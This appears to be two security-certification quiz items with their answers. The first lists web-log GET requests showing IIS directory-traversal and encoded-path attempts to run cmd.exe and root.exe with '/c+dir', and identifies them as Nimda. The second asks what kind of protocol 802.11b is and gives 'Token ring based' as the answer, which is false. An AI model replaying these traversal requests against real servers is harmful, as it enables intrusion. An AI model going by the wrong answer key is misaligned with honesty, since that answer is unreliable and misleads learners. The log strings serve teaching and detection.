You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this? Picture: (Test 8 #99) GET /scripts/root.exe?/c+dir GET /MSDAC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..% 5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..% 5c../winnt/system32/cmd.exe?/c+dir GET /msdac/..%5c../..%5c../..%5c/..xc1xc../..xc1xc../..xc1xc../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1xc../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc0x9c/winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..% 2f..winnt/system32/cmd.exe?/c+dir a. The PIF virus b. Code Red c. Ping of Death d. The Morris worm e. Nimda f. Trinoo
e. Nimda
802.11b is considered a ____________ protocol. a. Secure b. Unreliable c. Unsecure d. Connectionless e. Token ring based
e. Token ring based
